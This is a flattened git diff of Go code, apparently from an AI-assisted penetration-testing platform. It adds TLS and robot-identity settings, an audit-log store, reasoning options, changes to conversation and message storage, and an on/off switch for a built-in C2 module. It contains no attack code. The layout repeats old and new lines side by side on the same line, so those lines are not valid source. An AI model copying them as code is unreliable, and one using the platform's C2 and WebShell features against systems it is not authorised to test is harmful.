StrictUserIdentity *bool `yaml:"strict_user_identity,omitempty" json:"strict_user_identity,omitempty"` // true 时只允许真实用户标识,不允许会话/群 ID 兜底
}
// StrictUserIdentityEnabled 返回是否启用严格用户身份模式;未配置时默认 true。
func (c RobotSessionConfig) StrictUserIdentityEnabled() bool {
if c.StrictUserIdentity == nil {
return true
}
return *c.StrictUserIdentity
}
// RobotWecomConfig 企业微信机器人配置 // RobotWecomConfig 企业微信机器人配置
type RobotWecomConfig struct { type RobotWecomConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"` Enabled bool `yaml:"enabled" json:"enabled"`
@@ -179,22 +454,33 @@ type RobotWecomConfig struct {
// RobotDingtalkConfig 钉钉机器人配置 // RobotDingtalkConfig 钉钉机器人配置
type RobotDingtalkConfig struct { type RobotDingtalkConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"` Enabled bool `yaml:"enabled" json:"enabled"`
ClientID string `yaml:"client_id" json:"client_id"` // 应用 Key (AppKey) ClientID string `yaml:"client_id" json:"client_id"` // 应用 Key (AppKey)
ClientSecret string `yaml:"client_secret" json:"client_secret"` // 应用 Secret ClientSecret string `yaml:"client_secret" json:"client_secret"` // 应用 Secret
AllowConversationIDFallback bool `yaml:"allow_conversation_id_fallback" json:"allow_conversation_id_fallback"` // sender_id 缺失时是否允许回退到会话 ID
} }
// RobotLarkConfig 飞书机器人配置 // RobotLarkConfig 飞书机器人配置
type RobotLarkConfig struct { type RobotLarkConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"` Enabled bool `yaml:"enabled" json:"enabled"`
AppID string `yaml:"app_id" json:"app_id"` // 应用 App ID AppID string `yaml:"app_id" json:"app_id"` // 应用 App ID
AppSecret string `yaml:"app_secret" json:"app_secret"` // 应用 App Secret AppSecret string `yaml:"app_secret" json:"app_secret"` // 应用 App Secret
VerifyToken string `yaml:"verify_token" json:"verify_token"` // 事件订阅 Verification Token(可选) VerifyToken string `yaml:"verify_token" json:"verify_token"` // 事件订阅 Verification Token(可选)
AllowChatIDFallback bool `yaml:"allow_chat_id_fallback" json:"allow_chat_id_fallback"` // 用户 ID 缺失时是否允许回退到 chat_id
} }
type ServerConfig struct { type ServerConfig struct {
Host string `yaml:"host"` Host string `yaml:"host" json:"host"`
Port int `yaml:"port"` Port int `yaml:"port" json:"port"`
// TLSEnabled 为 true 时主 Web UI 使用 HTTPS;现代浏览器在同源下会协商 HTTP/2,缓解 HTTP/1.1 每源并发连接数限制。
TLSEnabled bool `yaml:"tls_enabled,omitempty" json:"tls_enabled,omitempty"`
// TLSCertPath / TLSKeyPath 非空时从 PEM 文件加载证书(生产环境推荐)。
TLSCertPath string `yaml:"tls_cert_path,omitempty" json:"tls_cert_path,omitempty"`
TLSKeyPath string `yaml:"tls_key_path,omitempty" json:"tls_key_path,omitempty"`
// TLSAutoSelfSign 为 true 且未配置有效证书路径时,启动时生成内存自签证书(仅本地/测试;浏览器会提示不受信任)。
TLSAutoSelfSign bool `yaml:"tls_auto_self_sign,omitempty" json:"tls_auto_self_sign,omitempty"`
// TLSHTTPRedirect 为 false 时禁用 HTTP→HTTPS 跳转;省略或为 true 且已启用 HTTPS 时,明文 HTTP 访问将 308 跳转到 HTTPS(同端口嗅探分流)。
TLSHTTPRedirect *bool `yaml:"tls_http_redirect,omitempty" json:"tls_http_redirect,omitempty"`
} }
type LogConfig struct { type LogConfig struct {
@@ -216,6 +502,48 @@ type OpenAIConfig struct {
BaseURL string `yaml:"base_url" json:"base_url"` BaseURL string `yaml:"base_url" json:"base_url"`
Model string `yaml:"model" json:"model"` Model string `yaml:"model" json:"model"`
MaxTotalTokens int `yaml:"max_total_tokens,omitempty" json:"max_total_tokens,omitempty"` MaxTotalTokens int `yaml:"max_total_tokens,omitempty" json:"max_total_tokens,omitempty"`
// Reasoning 控制 Eino ChatModel 的 thinking / reasoning_effort / output_config 等(仅 Eino 路径生效;原生 ReAct 忽略)。
Reasoning OpenAIReasoningConfig `yaml:"reasoning,omitempty" json:"reasoning,omitempty"`
}
// OpenAIReasoningConfig 全局默认与网关 profile(对话页可通过 ChatRequest.reasoning 覆盖,受 AllowClientReasoning 约束)。
type OpenAIReasoningConfig struct {
// Mode: auto(默认)| on | off | default(与 auto 相同)。off 时不向模型附加推理扩展字段。
Mode string `yaml:"mode,omitempty" json:"mode,omitempty"`
// Effort: low | medium | high | max;空表示不单独指定强度(各 profile 行为见 internal/reasoning)。
Effort string `yaml:"effort,omitempty" json:"effort,omitempty"`
// AllowClientReasoning 为 false 时忽略请求体 reasoningnil 或未设置等同于 true。
AllowClientReasoning *bool `yaml:"allow_client_reasoning,omitempty" json:"allow_client_reasoning,omitempty"`
// Profile: auto | deepseek_compat | openai_compat | output_config_effort
Profile string `yaml:"profile,omitempty" json:"profile,omitempty"`
// ExtraRequestFields 合并进 Chat Completions 根 JSON(管理员用;与自动字段同名时后者覆盖)。
ExtraRequestFields map[string]interface{} `yaml:"extra_request_fields,omitempty" json:"extra_request_fields,omitempty"`
}
// ModeEffective returns auto when empty or default.
func (c OpenAIReasoningConfig) ModeEffective() string {
m := strings.ToLower(strings.TrimSpace(c.Mode))
if m == "" || m == "default" {
return "auto"
}
return m
}
// ProfileEffective returns auto when empty.
func (c OpenAIReasoningConfig) ProfileEffective() string {
p := strings.ToLower(strings.TrimSpace(c.Profile))
if p == "" {
return "auto"
}
return p
}
// AllowClientReasoningEffective true when client may send ChatRequest.reasoning.
func (c OpenAIReasoningConfig) AllowClientReasoningEffective() bool {
if c.AllowClientReasoning == nil {
return true
}
return *c.AllowClientReasoning
} }
type FofaConfig struct { type FofaConfig struct {
@@ -260,6 +588,51 @@ type AuthConfig struct {
GeneratedPasswordPersistErr string `yaml:"-" json:"-"` GeneratedPasswordPersistErr string `yaml:"-" json:"-"`
} }
// AuditConfig platform operation audit log settings (not chat/tool execution bodies).
type AuditConfig struct {
// Enabled nil or true enables persistence; explicit false disables.
Enabled *bool `yaml:"enabled,omitempty" json:"enabled,omitempty"`
RetentionDays int `yaml:"retention_days,omitempty" json:"retention_days,omitempty"`
MaxDetailBytes int `yaml:"max_detail_bytes,omitempty" json:"max_detail_bytes,omitempty"`
// AuthFailureCooldownSeconds: per-IP cooldown for auth login/change_password failure audit rows; -1 disables; 0 uses default 60.
AuthFailureCooldownSeconds int `yaml:"auth_failure_cooldown_seconds,omitempty" json:"auth_failure_cooldown_seconds,omitempty"`
}
// EnabledEffective returns true unless audit.enabled is explicitly false.
func (a AuditConfig) EnabledEffective() bool {
if a.Enabled == nil {
return true
}
return *a.Enabled
}
// RetentionDaysEffective returns retention; 0 means keep forever.
func (a AuditConfig) RetentionDaysEffective() int {
if a.RetentionDays < 0 {
return 0
}
return a.RetentionDays
}
// MaxDetailBytesEffective caps serialized detail JSON size.
func (a AuditConfig) MaxDetailBytesEffective() int {
if a.MaxDetailBytes <= 0 {
return 8192
}
return a.MaxDetailBytes
}
// AuthFailureCooldownEffective returns seconds between duplicate auth-failure audit rows per IP (default 60; -1 disables).
func (a AuditConfig) AuthFailureCooldownEffective() int {
if a.AuthFailureCooldownSeconds < 0 {
return 0
}
if a.AuthFailureCooldownSeconds == 0 {
return 60
}
return a.AuthFailureCooldownSeconds
}
// ExternalMCPConfig 外部MCP配置 // ExternalMCPConfig 外部MCP配置
type ExternalMCPConfig struct { type ExternalMCPConfig struct {
Servers map[string]ExternalMCPServerConfig `yaml:"servers,omitempty" json:"servers,omitempty"` Servers map[string]ExternalMCPServerConfig `yaml:"servers,omitempty" json:"servers,omitempty"`
@@ -352,7 +725,9 @@ func Load(path string) (*Config, error) {
if cfg.Auth.SessionDurationHours <= 0 { if cfg.Auth.SessionDurationHours <= 0 {
cfg.Auth.SessionDurationHours = 12 cfg.Auth.SessionDurationHours = 12
} }
if cfg.Audit.MaxDetailBytes <= 0 {
cfg.Audit.MaxDetailBytes = 8192
}
if strings.TrimSpace(cfg.Auth.Password) == "" { if strings.TrimSpace(cfg.Auth.Password) == "" {
password, err := generateStrongPassword(24) password, err := generateStrongPassword(24)
if err != nil { if err != nil {
@@ -821,6 +1196,7 @@ func LoadRoleFromFile(path string) (*RoleConfig, error) {
} }
func Default() *Config { func Default() *Config {
strictRobotIdentity := true
return &Config{ return &Config{
Server: ServerConfig{ Server: ServerConfig{
Host: "0.0.0.0", Host: "0.0.0.0",
@@ -855,6 +1231,19 @@ func Default() *Config {
Auth: AuthConfig{ Auth: AuthConfig{
SessionDurationHours: 12, SessionDurationHours: 12,
}, },
Audit: func() AuditConfig {
on := true
return AuditConfig{
RetentionDays: 90,
MaxDetailBytes: 8192,
Enabled: &on,
}
}(),
Robots: RobotsConfig{
Session: RobotSessionConfig{
StrictUserIdentity: &strictRobotIdentity,
},
},
Knowledge: KnowledgeConfig{ Knowledge: KnowledgeConfig{
Enabled: true, Enabled: true,
BasePath: "knowledge_base", BasePath: "knowledge_base",
@@ -885,6 +1274,35 @@ func Default() *Config {
} }
} }
// C2Config 内置 C2 模块开关(与知识库 enabled 语义一致:关闭后不初始化监听器、不注册 C2 MCP 工具)。
type C2Config struct {
// Enabled 为 nil 表示未写配置,按 true 处理(兼容旧 config.yaml
Enabled *bool `yaml:"enabled,omitempty" json:"enabled,omitempty"`
}
// EnabledEffective 返回是否启用 C2;未显式配置时默认启用。
func (c C2Config) EnabledEffective() bool {
if c.Enabled == nil {
return true
}
return *c.Enabled
}
// C2Public 返回给前端的 C2 状态(仅标量)。
type C2Public struct {
Enabled bool `json:"enabled"`
}
// Public 将内部配置转为 API 响应。
func (c C2Config) Public() C2Public {
return C2Public{Enabled: c.EnabledEffective()}
}
// C2APIUpdate 设置页/API 更新 C2 开关。
type C2APIUpdate struct {
Enabled bool `json:"enabled"`
}
// KnowledgeConfig 知识库配置 // KnowledgeConfig 知识库配置
type KnowledgeConfig struct { type KnowledgeConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用知识检索 Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用知识检索
+46
View File
@@ -0,0 +1,46 @@
package config
import "strings"
// MainWebUIUsesHTTPS 判断主 Web UI 是否以 HTTPS 监听(与 internal/app.prepareMainServerTLS 前置条件一致)。
func MainWebUIUsesHTTPS(s *ServerConfig) bool {
if s == nil {
return false
}
if s.TLSEnabled {
return true
}
if s.TLSAutoSelfSign {
return true
}
cert := strings.TrimSpace(s.TLSCertPath)
key := strings.TrimSpace(s.TLSKeyPath)
return cert != "" && key != ""
}
// ServerHTTPRedirectEnabled 是否在主站启用 HTTPS 时把明文 HTTP 请求重定向到 HTTPS(默认开启)。
func ServerHTTPRedirectEnabled(s *ServerConfig) bool {
if s == nil || !MainWebUIUsesHTTPS(s) {
return false
}
if s.TLSHTTPRedirect == nil {
return true
}
return *s.TLSHTTPRedirect
}
// ApplyDevHTTPSBootstrap 供 --https / 一键脚本使用:强制开启主站 TLS。
// 若已配置 tls_cert_path 与 tls_key_path 则仅用 PEM,不开启自签;否则启用 tls_auto_self_sign(内存证书,仅本地测试)。
func ApplyDevHTTPSBootstrap(cfg *Config) {
if cfg == nil {
return
}
cfg.Server.TLSEnabled = true
cert := strings.TrimSpace(cfg.Server.TLSCertPath)
key := strings.TrimSpace(cfg.Server.TLSKeyPath)
if cert != "" && key != "" {
cfg.Server.TLSAutoSelfSign = false
return
}
cfg.Server.TLSAutoSelfSign = true
}
-1
View File
@@ -165,4 +165,3 @@ func (db *DB) DeleteAttackChain(conversationID string) error {
return nil return nil
} }
+210
View File
@@ -0,0 +1,210 @@
package database
import (
"encoding/json"
"errors"
"strings"
"time"
)
// AuditLog platform operation audit record.
type AuditLog struct {
ID string `json:"id"`
CreatedAt time.Time `json:"createdAt"`
Level string `json:"level"`
Category string `json:"category"`
Action string `json:"action"`
Result string `json:"result"`
Actor string `json:"actor"`
SessionHint string `json:"sessionHint,omitempty"`
ClientIP string `json:"clientIp,omitempty"`
UserAgent string `json:"userAgent,omitempty"`
ResourceType string `json:"resourceType,omitempty"`
ResourceID string `json:"resourceId,omitempty"`
ResourceAvailable *bool `json:"resourceAvailable,omitempty"` // API-only: whether linked resource still exists
Message string `json:"message"`
Detail map[string]interface{} `json:"detail,omitempty"`
}
// ListAuditLogsFilter query parameters.
type ListAuditLogsFilter struct {
Level string
Category string
Action string
Result string
Query string
ResourceType string
ResourceID string
Since *time.Time
Until *time.Time
Limit int
Offset int
}
func buildAuditLogsWhere(filter ListAuditLogsFilter) (string, []interface{}) {
conditions := []string{"1=1"}
args := []interface{}{}
if filter.Level != "" {
conditions = append(conditions, "level = ?")
args = append(args, filter.Level)
}
if filter.Category != "" {
conditions = append(conditions, "category = ?")
args = append(args, filter.Category)
}
if filter.Action != "" {
conditions = append(conditions, "action = ?")
args = append(args, filter.Action)
}
if filter.Result != "" {
conditions = append(conditions, "result = ?")
args = append(args, filter.Result)
}
if filter.ResourceType != "" {
conditions = append(conditions, "resource_type = ?")
args = append(args, filter.ResourceType)
}
if filter.ResourceID != "" {
conditions = append(conditions, "resource_id = ?")
args = append(args, filter.ResourceID)
}
if filter.Since != nil {
conditions = append(conditions, "created_at >= ?")
args = append(args, *filter.Since)
}
if filter.Until != nil {
conditions = append(conditions, "created_at <= ?")
args = append(args, *filter.Until)
}
if q := strings.TrimSpace(filter.Query); q != "" {
like := "%" + q + "%"
conditions = append(conditions, "(message LIKE ? OR resource_id LIKE ? OR action LIKE ? OR category LIKE ?)")
args = append(args, like, like, like, like)
}
return strings.Join(conditions, " AND "), args
}
// AppendAuditLog inserts one audit row.
func (db *DB) AppendAuditLog(row *AuditLog) error {
if row == nil {
return errors.New("audit log is nil")
}
if strings.TrimSpace(row.ID) == "" {
return errors.New("audit id is required")
}
if row.CreatedAt.IsZero() {
row.CreatedAt = time.Now()
}
if strings.TrimSpace(row.Level) == "" {
row.Level = "info"
}
detailJSON := ""
if len(row.Detail) > 0 {
if b, err := json.Marshal(row.Detail); err == nil {
detailJSON = string(b)
}
}
query := `
INSERT INTO audit_logs (
id, created_at, level, category, action, result, actor, session_hint,
client_ip, user_agent, resource_type, resource_id, message, detail_json
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
`
_, err := db.Exec(query,
row.ID, row.CreatedAt, row.Level, row.Category, row.Action, row.Result,
row.Actor, row.SessionHint, row.ClientIP, row.UserAgent,
row.ResourceType, row.ResourceID, row.Message, detailJSON,
)
return err
}
// GetAuditLogByID returns one row.
func (db *DB) GetAuditLogByID(id string) (*AuditLog, error) {
id = strings.TrimSpace(id)
if id == "" {
return nil, errors.New("id is required")
}
query := `
SELECT id, created_at, level, category, action, result, actor,
COALESCE(session_hint, ''), COALESCE(client_ip, ''), COALESCE(user_agent, ''),
COALESCE(resource_type, ''), COALESCE(resource_id, ''), message, COALESCE(detail_json, '')
FROM audit_logs WHERE id = ?
`
var row AuditLog
var detailJSON string
err := db.QueryRow(query, id).Scan(
&row.ID, &row.CreatedAt, &row.Level, &row.Category, &row.Action, &row.Result, &row.Actor,
&row.SessionHint, &row.ClientIP, &row.UserAgent,
&row.ResourceType, &row.ResourceID, &row.Message, &detailJSON,
)
if err != nil {
return nil, err
}
if detailJSON != "" {
_ = json.Unmarshal([]byte(detailJSON), &row.Detail)
}
return &row, nil
}
// CountAuditLogs counts rows matching filter.
func (db *DB) CountAuditLogs(filter ListAuditLogsFilter) (int64, error) {
where, args := buildAuditLogsWhere(filter)
query := `SELECT COUNT(*) FROM audit_logs WHERE ` + where
var n int64
err := db.QueryRow(query, args...).Scan(&n)
return n, err
}
// ListAuditLogs lists audit rows newest first.
func (db *DB) ListAuditLogs(filter ListAuditLogsFilter) ([]*AuditLog, error) {
where, args := buildAuditLogsWhere(filter)
limit := filter.Limit
if limit <= 0 || limit > 500 {
limit = 50
}
offset := filter.Offset
if offset < 0 {
offset = 0
}
query := `
SELECT id, created_at, level, category, action, result, actor,
COALESCE(session_hint, ''), COALESCE(client_ip, ''), COALESCE(user_agent, ''),
COALESCE(resource_type, ''), COALESCE(resource_id, ''), message, COALESCE(detail_json, '')
FROM audit_logs
WHERE ` + where + `
ORDER BY created_at DESC
LIMIT ? OFFSET ?
`
args = append(args, limit, offset)
rows, err := db.Query(query, args...)
if err != nil {
return nil, err
}
defer rows.Close()
var list []*AuditLog
for rows.Next() {
var row AuditLog
var detailJSON string
if err := rows.Scan(
&row.ID, &row.CreatedAt, &row.Level, &row.Category, &row.Action, &row.Result, &row.Actor,
&row.SessionHint, &row.ClientIP, &row.UserAgent,
&row.ResourceType, &row.ResourceID, &row.Message, &detailJSON,
); err != nil {
continue
}
if detailJSON != "" {
_ = json.Unmarshal([]byte(detailJSON), &row.Detail)
}
list = append(list, &row)
}
return list, rows.Err()
}
// DeleteAuditLogsBefore removes rows older than cutoff.
func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) {
res, err := db.Exec(`DELETE FROM audit_logs WHERE created_at < ?`, cutoff)
if err != nil {
return 0, err
}
return res.RowsAffected()
}
File diff suppressed because it is too large Load Diff
+108 -30
View File
@@ -4,6 +4,8 @@ import (
"database/sql" "database/sql"
"encoding/json" "encoding/json"
"fmt" "fmt"
"os"
"path/filepath"
"strings" "strings"
"time" "time"
@@ -23,22 +25,24 @@ type Conversation struct {
// Message 消息 // Message 消息
type Message struct { type Message struct {
ID string `json:"id"` ID string `json:"id"`
ConversationID string `json:"conversationId"` ConversationID string `json:"conversationId"`
Role string `json:"role"` Role string `json:"role"`
Content string `json:"content"` Content string `json:"content"`
MCPExecutionIDs []string `json:"mcpExecutionIds,omitempty"` ReasoningContent string `json:"reasoningContent,omitempty"`
ProcessDetails []map[string]interface{} `json:"processDetails,omitempty"` MCPExecutionIDs []string `json:"mcpExecutionIds,omitempty"`
CreatedAt time.Time `json:"createdAt"` ProcessDetails []map[string]interface{} `json:"processDetails,omitempty"`
CreatedAt time.Time `json:"createdAt"`
UpdatedAt time.Time `json:"updatedAt"`
} }
// CreateConversation 创建新对话 // CreateConversation 创建新对话
func (db *DB) CreateConversation(title string) (*Conversation, error) { func (db *DB) CreateConversation(title string, meta ConversationCreateMeta) (*Conversation, error) {
return db.CreateConversationWithWebshell("", title) return db.CreateConversationWithWebshell("", title, meta)
} }
// CreateConversationWithWebshell 创建新对话,可选绑定 WebShell 连接 ID(为空则普通对话) // CreateConversationWithWebshell 创建新对话,可选绑定 WebShell 连接 ID(为空则普通对话)
func (db *DB) CreateConversationWithWebshell(webshellConnectionID, title string) (*Conversation, error) { func (db *DB) CreateConversationWithWebshell(webshellConnectionID, title string, meta ConversationCreateMeta) (*Conversation, error) {
id := uuid.New().String() id := uuid.New().String()
now := time.Now() now := time.Now()
@@ -58,12 +62,17 @@ func (db *DB) CreateConversationWithWebshell(webshellConnectionID, title string)
return nil, fmt.Errorf("创建对话失败: %w", err) return nil, fmt.Errorf("创建对话失败: %w", err)
} }
return &Conversation{ conv := &Conversation{
ID: id, ID: id,
Title: title, Title: title,
CreatedAt: now, CreatedAt: now,
UpdatedAt: now, UpdatedAt: now,
}, nil }
if webshellConnectionID != "" {
meta.WebShellConnectionID = webshellConnectionID
}
notifyConversationCreated(conv, meta)
return conv, nil
} }
// GetConversationByWebshellConnectionID 根据 WebShell 连接 ID 获取该连接下最近一条对话(用于 AI 助手持久化) // GetConversationByWebshellConnectionID 根据 WebShell 连接 ID 获取该连接下最近一条对话(用于 AI 助手持久化)
@@ -113,6 +122,7 @@ func (db *DB) GetConversationByWebshellConnectionID(connectionID string) (*Conve
} }
for i := range conv.Messages { for i := range conv.Messages {
if details, ok := processDetailsMap[conv.Messages[i].ID]; ok { if details, ok := processDetailsMap[conv.Messages[i].ID]; ok {
details = DedupeConsecutiveProcessDetails(details)
detailsJSON := make([]map[string]interface{}, len(details)) detailsJSON := make([]map[string]interface{}, len(details))
for j, detail := range details { for j, detail := range details {
var data interface{} var data interface{}
@@ -177,6 +187,23 @@ func (db *DB) ListConversationsByWebshellConnectionID(connectionID string) ([]We
return list, rows.Err() return list, rows.Err()
} }
// ConversationExists reports whether a conversation row exists (lightweight check for audit links).
func (db *DB) ConversationExists(id string) (bool, error) {
id = strings.TrimSpace(id)
if id == "" {
return false, nil
}
var one int
err := db.QueryRow("SELECT 1 FROM conversations WHERE id = ? LIMIT 1", id).Scan(&one)
if err == sql.ErrNoRows {
return false, nil
}
if err != nil {
return false, err
}
return true, nil
}
// GetConversation 获取对话 // GetConversation 获取对话
func (db *DB) GetConversation(id string) (*Conversation, error) { func (db *DB) GetConversation(id string) (*Conversation, error) {
var conv Conversation var conv Conversation
@@ -231,6 +258,7 @@ func (db *DB) GetConversation(id string) (*Conversation, error) {
// 将过程详情附加到对应的消息上 // 将过程详情附加到对应的消息上
for i := range conv.Messages { for i := range conv.Messages {
if details, ok := processDetailsMap[conv.Messages[i].ID]; ok { if details, ok := processDetailsMap[conv.Messages[i].ID]; ok {
details = DedupeConsecutiveProcessDetails(details)
// 将ProcessDetail转换为JSON格式,以便前端使用 // 将ProcessDetail转换为JSON格式,以便前端使用
detailsJSON := make([]map[string]interface{}, len(details)) detailsJSON := make([]map[string]interface{}, len(details))
for j, detail := range details { for j, detail := range details {
@@ -308,7 +336,7 @@ func (db *DB) GetConversationLite(id string) (*Conversation, error) {
func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversation, error) { func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversation, error) {
var rows *sql.Rows var rows *sql.Rows
var err error var err error
if search != "" { if search != "" {
// 使用 EXISTS 子查询代替 LEFT JOIN + DISTINCT,避免大表笛卡尔积 // 使用 EXISTS 子查询代替 LEFT JOIN + DISTINCT,避免大表笛卡尔积
searchPattern := "%" + search + "%" searchPattern := "%" + search + "%"
@@ -327,7 +355,7 @@ func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversati
limit, offset, limit, offset,
) )
} }
if err != nil { if err != nil {
return nil, fmt.Errorf("查询对话列表失败: %w", err) return nil, fmt.Errorf("查询对话列表失败: %w", err)
} }
@@ -416,25 +444,34 @@ func (db *DB) DeleteConversation(id string) error {
if err != nil { if err != nil {
return fmt.Errorf("删除对话失败: %w", err) return fmt.Errorf("删除对话失败: %w", err)
} }
// Best-effort cleanup for conversation-scoped filesystem artifacts
// (e.g., summarization transcript, reduction/checkpoint files under conversation_artifacts/<id>).
if base := strings.TrimSpace(db.conversationArtifactsDir); base != "" {
artDir := filepath.Join(base, id)
if rmErr := os.RemoveAll(artDir); rmErr != nil {
db.logger.Warn("删除会话 artifacts 目录失败", zap.String("conversationId", id), zap.String("dir", artDir), zap.Error(rmErr))
}
}
db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id)) db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id))
return nil return nil
} }
// SaveReActData 保存最后一轮ReAct的输入和输出 // SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。
func (db *DB) SaveReActData(conversationID, reactInput, reactOutput string) error { // SQLite 列名仍为 last_react_input / last_react_output,与历史库表兼容;语义上为「全模式代理轨迹」,非仅 ReAct。
func (db *DB) SaveAgentTrace(conversationID, traceInputJSON, assistantOutput string) error {
_, err := db.Exec( _, err := db.Exec(
"UPDATE conversations SET last_react_input = ?, last_react_output = ?, updated_at = ? WHERE id = ?", "UPDATE conversations SET last_react_input = ?, last_react_output = ?, updated_at = ? WHERE id = ?",
reactInput, reactOutput, time.Now(), conversationID, traceInputJSON, assistantOutput, time.Now(), conversationID,
) )
if err != nil { if err != nil {
return fmt.Errorf("保存ReAct数据失败: %w", err) return fmt.Errorf("保存代理轨迹失败: %w", err)
} }
return nil return nil
} }
// GetReActData 获取最后一轮ReAct的输入和输出 // GetAgentTrace 读取 conversations 中保存的代理轨迹(列名 last_react_*)。
func (db *DB) GetReActData(conversationID string) (reactInput, reactOutput string, err error) { func (db *DB) GetAgentTrace(conversationID string) (traceInputJSON, assistantOutput string, err error) {
var input, output sql.NullString var input, output sql.NullString
err = db.QueryRow( err = db.QueryRow(
"SELECT last_react_input, last_react_output FROM conversations WHERE id = ?", "SELECT last_react_input, last_react_output FROM conversations WHERE id = ?",
@@ -444,17 +481,17 @@ func (db *DB) GetReActData(conversationID string) (reactInput, reactOutput strin
if err == sql.ErrNoRows { if err == sql.ErrNoRows {
return "", "", fmt.Errorf("对话不存在") return "", "", fmt.Errorf("对话不存在")
} }
return "", "", fmt.Errorf("获取ReAct数据失败: %w", err) return "", "", fmt.Errorf("获取代理轨迹失败: %w", err)
} }
if input.Valid { if input.Valid {
reactInput = input.String traceInputJSON = input.String
} }
if output.Valid { if output.Valid {
reactOutput = output.String assistantOutput = output.String
} }
return reactInput, reactOutput, nil return traceInputJSON, assistantOutput, nil
} }
// ConversationHasToolProcessDetails 对话是否存在已落库的工具调用/结果(用于多代理等场景下 MCP execution id 未汇总时的攻击链判定)。 // ConversationHasToolProcessDetails 对话是否存在已落库的工具调用/结果(用于多代理等场景下 MCP execution id 未汇总时的攻击链判定)。
@@ -473,6 +510,7 @@ func (db *DB) ConversationHasToolProcessDetails(conversationID string) (bool, er
// AddMessage 添加消息 // AddMessage 添加消息
func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs []string) (*Message, error) { func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs []string) (*Message, error) {
id := uuid.New().String() id := uuid.New().String()
now := time.Now()
var mcpIDsJSON string var mcpIDsJSON string
if len(mcpExecutionIDs) > 0 { if len(mcpExecutionIDs) > 0 {
@@ -485,8 +523,8 @@ func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs [
} }
_, err := db.Exec( _, err := db.Exec(
"INSERT INTO messages (id, conversation_id, role, content, mcp_execution_ids, created_at) VALUES (?, ?, ?, ?, ?, ?)", "INSERT INTO messages (id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
id, conversationID, role, content, mcpIDsJSON, time.Now(), id, conversationID, role, content, "", mcpIDsJSON, now, now,
) )
if err != nil { if err != nil {
return nil, fmt.Errorf("添加消息失败: %w", err) return nil, fmt.Errorf("添加消息失败: %w", err)
@@ -503,16 +541,37 @@ func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs [
Role: role, Role: role,
Content: content, Content: content,
MCPExecutionIDs: mcpExecutionIDs, MCPExecutionIDs: mcpExecutionIDs,
CreatedAt: time.Now(), CreatedAt: now,
UpdatedAt: now,
} }
return message, nil return message, nil
} }
// UpdateAssistantMessageFinalize 更新助手消息终态(正文、MCP id、思考链聚合文本,供无轨迹回退时回放)。
func (db *DB) UpdateAssistantMessageFinalize(messageID, content string, mcpExecutionIDs []string, reasoningContent string) error {
var mcpIDsJSON string
if len(mcpExecutionIDs) > 0 {
jsonData, err := json.Marshal(mcpExecutionIDs)
if err != nil {
return fmt.Errorf("序列化MCP执行ID失败: %w", err)
}
mcpIDsJSON = string(jsonData)
}
_, err := db.Exec(
"UPDATE messages SET content = ?, mcp_execution_ids = ?, reasoning_content = ?, updated_at = ? WHERE id = ?",
content, mcpIDsJSON, strings.TrimSpace(reasoningContent), time.Now(), messageID,
)
if err != nil {
return fmt.Errorf("更新助手消息失败: %w", err)
}
return nil
}
// GetMessages 获取对话的所有消息 // GetMessages 获取对话的所有消息
func (db *DB) GetMessages(conversationID string) ([]Message, error) { func (db *DB) GetMessages(conversationID string) ([]Message, error) {
rows, err := db.Query( rows, err := db.Query(
"SELECT id, conversation_id, role, content, mcp_execution_ids, created_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC", "SELECT id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC",
conversationID, conversationID,
) )
if err != nil { if err != nil {
@@ -523,12 +582,17 @@ func (db *DB) GetMessages(conversationID string) ([]Message, error) {
var messages []Message var messages []Message
for rows.Next() { for rows.Next() {
var msg Message var msg Message
var reasoning sql.NullString
var mcpIDsJSON sql.NullString var mcpIDsJSON sql.NullString
var createdAt string var createdAt string
var updatedAt sql.NullString
if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &mcpIDsJSON, &createdAt); err != nil { if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &reasoning, &mcpIDsJSON, &createdAt, &updatedAt); err != nil {
return nil, fmt.Errorf("扫描消息失败: %w", err) return nil, fmt.Errorf("扫描消息失败: %w", err)
} }
if reasoning.Valid {
msg.ReasoningContent = reasoning.String
}
// 尝试多种时间格式解析 // 尝试多种时间格式解析
var err error var err error
@@ -540,6 +604,20 @@ func (db *DB) GetMessages(conversationID string) ([]Message, error) {
msg.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) msg.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
} }
// updated_at 兼容老库:字段不存在/为空时回退为 created_at
if updatedAt.Valid && strings.TrimSpace(updatedAt.String) != "" {
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt.String)
if err != nil {
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05", updatedAt.String)
}
if err != nil {
msg.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt.String)
}
}
if msg.UpdatedAt.IsZero() {
msg.UpdatedAt = msg.CreatedAt
}
// 解析MCP执行ID // 解析MCP执行ID
if mcpIDsJSON.Valid && mcpIDsJSON.String != "" { if mcpIDsJSON.Valid && mcpIDsJSON.String != "" {
if err := json.Unmarshal([]byte(mcpIDsJSON.String), &msg.MCPExecutionIDs); err != nil { if err := json.Unmarshal([]byte(mcpIDsJSON.String), &msg.MCPExecutionIDs); err != nil {
@@ -654,7 +732,7 @@ type ProcessDetail struct {
